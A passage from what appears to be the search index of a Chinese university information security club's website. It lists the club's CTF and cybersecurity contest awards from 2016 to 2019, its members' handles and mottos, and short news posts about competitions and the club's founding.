\u5730\u70b9\uff1a\u56db\u5ddd\uff0c\u6210\u90fd\u5e02\u6210\u534e\u533a\u5efa\u8bbe\u5317\u8def\u4e00\u6bb558\u53f7\u4e16\u8302\u6210\u90fd\u8302\u5fa1\u9152\u5e97\uff084F\u5927\u5bb4\u4f1a\u5385\uff09 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u534e\u4e1c\u5357\u8d5b\u533a\u534a\u51b3\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u59d1\u82cf\u533a\u5e73\u6c5f\u65b0\u57ce\u82cf\u7ad9\u8def1588\u53f7\uff0c\u7ef4\u4e5f\u7eb3\u9152\u5e97\uff08\u82cf\u5dde\u706b\u8f66\u7ad9\u5317\u5e7f\u573a\u5e97\uff09\u4e09\u697c\u8096\u90a6\u5385 [2019/??/??] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e94\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u9ad8\u6821\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u7ba1\u7406\u8fd0\u7ef4\u6311\u6218\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u897f\u5b89 [2019/??/??] - \u201c\u9ec4\u9e64\u676f\u201d\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u4e0e\u521b\u65b0\u5cf0\u4f1a\u66a8\u7f51\u7edc\u5b89\u5168\u670d\u52a1\u4e0e\u521b\u65b0\u80fd\u529b\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6b66\u6c49 [2019/??/??] - \u897f\u6e56\u8bba\u5251\u4e2d\u56fd\u676d\u5dde\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6d59\u6c5f "},{"location":"award/#2018","title":"2018","text":" [2018/12/28] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/12/07] - \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u5317\u4eac\uff0c\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66 [2018/06/09] - \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u4f1a\u8bae\u4e2d\u5fc3 [2018/05/11] - 2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/04/26] - 2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6d59\u6c5f\u676d\u5dde\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2018/03/10] - *CTF 2018 97th [2018/03/10] - N1CTF 2018 83th [2018/??/??] - HITB-XCTF GSEC CTF 2018 Final\uff08Member\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u65b0\u52a0\u5761\uff08Singapore\uff09\uff0cNational University of Singapore "},{"location":"award/#2017","title":"2017","text":" [2017/11/26] - \u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u4e00\u7b49\u5956\uff08\u5168\u7701\u7b2c\u4e8c\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/11/23] - 360 SRC\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\uff08\u798f\u5dde\u7ad9\uff09 \u7efc\u5408\u79ef\u5206\u7b2c4\u540d [2017/11/10] - HCTF 2017 58th \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/10/27] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/04/22] - 2017\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u201c\u6606\u4ed1\u4e2d\u9510\u676f\u201d\u4f01\u4e1a\u8d5b \u51a0\u519b \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde\uff0c\u798f\u5dde\u5927\u5b66 "},{"location":"award/#2016","title":"2016","text":" [2016/12/11] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2016/06/09] - \u534f\u4f1a\u6210\u7acb "},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":" rYu1nser (IceCliffs) - \u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0c\u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0821-22\u534f\u4f1a\u4f1a\u957f\uff09 "},{"location":"member/#2020-2021","title":"2020-2021","text":" me7eorite - \uff08\u795e\uff09 x1aoB1n\uff08\u7c73\u536b\u5175\uff09 - \u539f\u795e60\u7ea7+\u661f\u7a79\u94c1\u905370\u7ea7\uff0820-21\u534f\u4f1a\u4f1a\u957f\uff09 \u6843\u5b50\u4e4c\u9f99 whisper "},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":" White - \u4e0d\u53ef\u7ed3\u7f18 \u5f92\u589e\u5bc2\u5bde Alienworm - \u8fd8\u6ca1\u627e\u5230\u95e8\u7684ctf\u9009\u624b Southseast - \u8346\u68d8\u523a\u7a7f\u6211\u7684\u811a\u638c\u8def\u574e\u5777\u800c\u6f2b\u957f\u3002 Cosmos - \u4eba\u751f\u5982\u9006\u65c5,\u6211\u4ea6\u662f\u884c\u4eba\u3002 Nepire - \u53a6\u822a\u516c\u5b50:\u4e00\u4efd\u4ee3\u7801\u5343\u4e24\u884c,\u79d1\u5b66\u4e0a\u7f51\u6211\u6700\u5f3a,\u8d5b\u540e\u79d2\u9898\u7406\u6c14\u58ee,\u633a\u8fdb\u51b3\u8d5b\u558a\u51c9\u51c9\u3002 \u8c46\u6d46\u6cb9\u6761 - \u5fd7\u5728\u5c71\u9876\u7684\u4eba\uff0c\u4e0d\u4f1a\u8d2a\u5ff5\u5c71\u8170\u7684\u98ce\u666f\u3002 SweetPotato - \u6211\u80fd\u541e\u4e0b\u73bb\u7483\u800c\u4e0d\u4f24\u8eab\u4f53 "},{"location":"member/#2017-2018","title":"2017-2018","text":" Sheldon - \u4eba\u751f\u4e0d\u5982\u610f,\u5341\u6709\u516b\u4e5d\uff0817-18\u534f\u4f1a\u4f1a\u957f\uff09 Saltyfishy - \u4eba\u5982\u679c\u6ca1\u6709\u68a6\u60f3\uff0c\u90a3\u53ef\u592a\u8212\u670d\u4e86\uff01 \u5f20\u52a8\u4e4b - \u5165\u95e8\u7ea7ctf\u9009\u624b "},{"location":"member/#2016-2017","title":"2016-2017","text":" PeterZ - \u4e00\u53ea\u6c89\u8ff7\u4ee3\u7801\u7684\u81ea\u7531\u9e70\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-17\u534f\u4f1a\u4f1a\u957f\uff09 Xishir - A code monster.\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-18\u534f\u4f1a\u526f\u4f1a\u957f\uff09 l1nk3r - \u613f\u4f60\u51fa\u8d70\u534a\u751f\u5f52\u6765\u4ecd\u662f\u5c11\u5e74 backCover7 - Light up the Night! Jaken - River flows in you. \u6ce1\u9762 - \u552f\u5229\u662f\u56fe ju5tw4nty0u - Nothing is impossible to a willing heart. "},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5
\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168
\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF
\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster
\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin
\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"CTF
\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002
48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002
\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n
\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01
\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n
360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002
\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u6d77\u62a5\uff1a
\u6bd4\u8d5b\u73b0\u573a\uff1a
\u6bd4\u8d5b\u6392\u884c\u699c\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u73b0\u573a\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"\u6bd4\u8d5b\u89c6\u9891\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\